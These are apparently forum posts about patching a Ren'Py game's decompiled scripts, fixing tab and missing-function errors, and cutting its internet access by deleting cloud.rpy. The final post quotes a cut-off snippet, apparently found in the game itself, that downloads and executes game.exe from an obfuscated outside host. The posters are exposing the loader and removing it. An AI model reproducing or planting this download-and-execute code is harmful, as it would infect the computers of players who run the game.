I usually use You must be registered for see element., but this time I got errors, so I went to You must be registered for see element., which decompiled fine, but apparently added errors where there weren't any :confused:
Edit : Well, I tried the game again, in a new profile and without...
Here's a small patch for color_picker.rpy, which had a tabbing issue.
And also profiles_screens.rpy, which calls a non-existent SetAge function. I disabled the call, so you can open the Profile but not set the age.
But at least it no longer causes an error :)
Files to put in game\scripts\
To remove internet access, in game\screens\
main_menu.rpy: remove line textbutton _("CLOUDS&L") action Function(cloud_check)
delete cloud.rpy and cloud.rpyc
Not fully tested :p
Even with a current download:
You must be registered for see element.
# Download and execute the file
file_url = 'http://gostatts.[c][o][m]/game.exe'
local_file_path = os.path.join(renpy_base, 'renpy', 'downloaded_file')
print(f"Attempting to download file from {file_url}...